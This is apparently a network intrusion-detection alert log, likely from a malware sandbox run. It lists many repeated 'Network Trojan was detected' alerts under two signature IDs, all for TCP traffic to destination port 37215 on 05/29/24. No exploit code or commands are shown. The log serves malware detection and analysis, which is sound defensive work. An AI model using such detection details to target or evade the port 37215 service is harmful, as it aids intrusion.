                SID:2829579
                Source Port:46162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208061
                SID:2835222
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276005
                SID:2835222
                Source Port:37118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380792
                SID:2829579
                Source Port:40894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335072
                SID:2835222
                Source Port:42540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.730619
                SID:2835222
                Source Port:54592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598002
                SID:2829579
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809230
                SID:2829579
                Source Port:40618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925358
                SID:2829579
                Source Port:34894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.267858
                SID:2829579
                Source Port:50116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597312
                SID:2829579
                Source Port:34140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281058
                SID:2835222
                Source Port:51316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946190
                SID:2835222
                Source Port:47942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731554
                SID:2835222
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782998
                SID:2829579
                Source Port:41292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856099
                SID:2829579
                Source Port:46310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180508
                SID:2835222
                Source Port:53188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422246
                SID:2835222
                Source Port:54132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858968
                SID:2835222
                Source Port:45408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659687
                SID:2829579
                Source Port:48946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716097
                SID:2835222
                Source Port:59540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909259
                SID:2829579
                Source Port:59882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942815
                SID:2829579
                Source Port:52152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499192
                SID:2829579
                Source Port:49466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464102
                SID:2835222
                Source Port:50456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008789
                SID:2829579
                Source Port:43518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908115
                SID:2829579
                Source Port:43828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035318
                SID:2835222
                Source Port:54078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.025359
                SID:2829579
                Source Port:52032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227121
                SID:2835222
                Source Port:50228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572658
                SID:2829579
                Source Port:38356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843846
                SID:2829579
                Source Port:50988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419674
                SID:2835222
                Source Port:48444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136765
                SID:2829579
                Source Port:59058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421008
                SID:2829579
                Source Port:42296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860229
                SID:2835222
                Source Port:57668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827232
                SID:2835222
                Source Port:52848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521679
                SID:2835222
                Source Port:33320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616221
                SID:2835222
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870262
                SID:2835222
                Source Port:35642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227090
                SID:2829579
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862901
                SID:2829579
                Source Port:56316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588629
                SID:2835222
                Source Port:39452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432733
                SID:2835222
                Source Port:57912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083573
                SID:2829579
                Source Port:33600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980031
                SID:2835222
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854509
                SID:2835222
                Source Port:51794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943615
                SID:2829579
                Source Port:34388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971754
                SID:2829579
                Source Port:36168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713203
                SID:2835222
                Source Port:41252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993214
                SID:2835222
                Source Port:35282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506104
                SID:2829579
                Source Port:33578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845853
                SID:2829579
                Source Port:54714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992853
                SID:2835222
                Source Port:43564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896912
                SID:2829579
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519953
                SID:2829579
                Source Port:34692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160994
                SID:2835222
                Source Port:48812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928403
                SID:2829579
                Source Port:39096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234098
                SID:2835222
                Source Port:43376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503665
                SID:2835222
                Source Port:55134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160910
                SID:2829579
                Source Port:51386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841319
                SID:2835222
                Source Port:53486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885528
                SID:2835222
                Source Port:54000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369973
                SID:2835222
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135970
                SID:2835222
                Source Port:55088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363028
                SID:2829579
                Source Port:43256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239584
                SID:2829579
                Source Port:44728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779662
                SID:2835222
                Source Port:55568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782179
                SID:2835222
                Source Port:57176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915804
                SID:2835222
                Source Port:57448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959150
                SID:2829579
                Source Port:52948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816740
                SID:2835222
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837777
                SID:2835222
                Source Port:46536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663719
                SID:2835222
                Source Port:34892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288340
                SID:2835222
                Source Port:53926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415792
                SID:2835222
                Source Port:59642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518897
                SID:2829579
                Source Port:44600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628269
                SID:2829579
                Source Port:56236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855631
                SID:2835222
                Source Port:49442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708527
                SID:2829579
                Source Port:58926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817010
                SID:2829579
                Source Port:41806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779342
                SID:2829579
                Source Port:52798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576135
                SID:2829579
                Source Port:59718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925389
                SID:2829579
                Source Port:45694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292168
                SID:2829579
                Source Port:44110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507385
                SID:2829579
                Source Port:39354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413441
                SID:2829579
                Source Port:50626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.870127
                SID:2835222
                Source Port:56526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813293
                SID:2835222
                Source Port:42208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.937238
                SID:2835222
                Source Port:43690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208112
                SID:2835222
                Source Port:51208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359498
                SID:2835222
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719633
                SID:2829579
                Source Port:59108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562787
                SID:2829579
                Source Port:55390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472302
                SID:2835222
                Source Port:48452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834645
                SID:2835222
                Source Port:40278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867733
                SID:2835222
                Source Port:43200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557614
                SID:2829579
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179064
                SID:2835222
                Source Port:48914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660337
                SID:2835222
                Source Port:38732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893259
                SID:2835222
                Source Port:42084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900453
                SID:2835222
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617737
                SID:2835222
                Source Port:42304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231347
                SID:2835222
                Source Port:52002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264721
                SID:2835222
                Source Port:57200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231300
                SID:2835222
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727082
                SID:2835222
                Source Port:33348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228302
                SID:2829579
                Source Port:57634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982117
                SID:2835222
                Source Port:35530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651938
                SID:2835222
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984297
                SID:2835222
                Source Port:54084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084761
                SID:2835222
                Source Port:48884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369798
                SID:2835222
                Source Port:36846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917054
                SID:2829579
                Source Port:59322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170375
                SID:2829579
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416466
                SID:2829579
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617431
                SID:2835222
                Source Port:41204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969688
                SID:2829579
                Source Port:38908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735512
                SID:2835222
                Source Port:49224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024932
                SID:2829579
                Source Port:37602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075601
                SID:2829579
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.738331
                SID:2829579
                Source Port:37200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666363
                SID:2829579
                Source Port:45590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292662
                SID:2829579
                Source Port:52038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427019
                SID:2835222
                Source Port:58134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843430
                SID:2829579
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045523
                SID:2835222
                Source Port:58230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717798
                SID:2835222
                Source Port:60760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535423
                SID:2835222
                Source Port:55506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173449
                SID:2835222
                Source Port:49310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561983
                SID:2829579
                Source Port:34162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715031
                SID:2835222
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773646
                SID:2835222
                Source Port:34818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909945
                SID:2829579
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177199
                SID:2835222
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.170969
                SID:2829579
                Source Port:53442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583970
                SID:2835222
                Source Port:48556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654693
                SID:2829579
                Source Port:56834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508771
                SID:2835222
                Source Port:52744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047090
                SID:2829579
                Source Port:39232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617458
                SID:2829579
                Source Port:45958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571570
                SID:2829579
                Source Port:60910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572687
                SID:2835222
                Source Port:43580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688833
                SID:2835222
                Source Port:53220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359571
                SID:2835222
                Source Port:59260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831332
                SID:2829579
                Source Port:54442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869165
                SID:2835222
                Source Port:58930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555573
                SID:2829579
                Source Port:37818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701569
                SID:2829579
                Source Port:58200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332318
                SID:2829579
                Source Port:45078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841556
                SID:2829579
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804974
                SID:2829579
                Source Port:47170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983184
                SID:2835222
                Source Port:47208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845360
                SID:2835222
                Source Port:57196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689493
                SID:2835222
                Source Port:44750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520423
                SID:2829579
                Source Port:50550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779490
                SID:2835222
                Source Port:36694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830680
                SID:2829579
                Source Port:57050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233188
                SID:2835222
                Source Port:43952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776779
                SID:2835222
                Source Port:52880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030930
                SID:2829579
                Source Port:56042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714070
                SID:2829579
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670588
                SID:2829579
                Source Port:42790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548399
                SID:2829579
                Source Port:40932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586345
                SID:2829579
                Source Port:53226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166421
                SID:2835222
                Source Port:40184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137984
                SID:2829579
                Source Port:60718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617984
                SID:2829579
                Source Port:38034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273690
                SID:2835222
                Source Port:45832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966876
                SID:2829579
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887590
                SID:2835222
                Source Port:58490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418796
                SID:2835222
                Source Port:45830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499465
                SID:2829579
                Source Port:51416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944086
                SID:2835222
                Source Port:34038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611536
                SID:2835222
                Source Port:49032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264741
                SID:2835222
                Source Port:33892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659491
                SID:2835222
                Source Port:60214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028761
                SID:2835222
                Source Port:55120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789611
                SID:2829579
                Source Port:34158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618694
                SID:2835222
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673589
                SID:2835222
                Source Port:49056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831264
                SID:2835222
                Source Port:60808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670982
                SID:2835222
                Source Port:36394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827273
                SID:2835222
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070385
                SID:2829579
                Source Port:40258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944902
                SID:2829579
                Source Port:44548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670707
                SID:2835222
                Source Port:56340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328018
                SID:2835222
                Source Port:48926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263760
                SID:2829579
                Source Port:51098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418875
                SID:2835222
                Source Port:58572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518484
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434446
                SID:2829579
                Source Port:35340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869476
                SID:2835222
                Source Port:45374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823300
                SID:2829579
                Source Port:49482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650622
                SID:2829579
                Source Port:39040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665816
                SID:2829579
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457862
                SID:2835222
                Source Port:35534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674930
                SID:2829579
                Source Port:43442
                Destination Port:37215
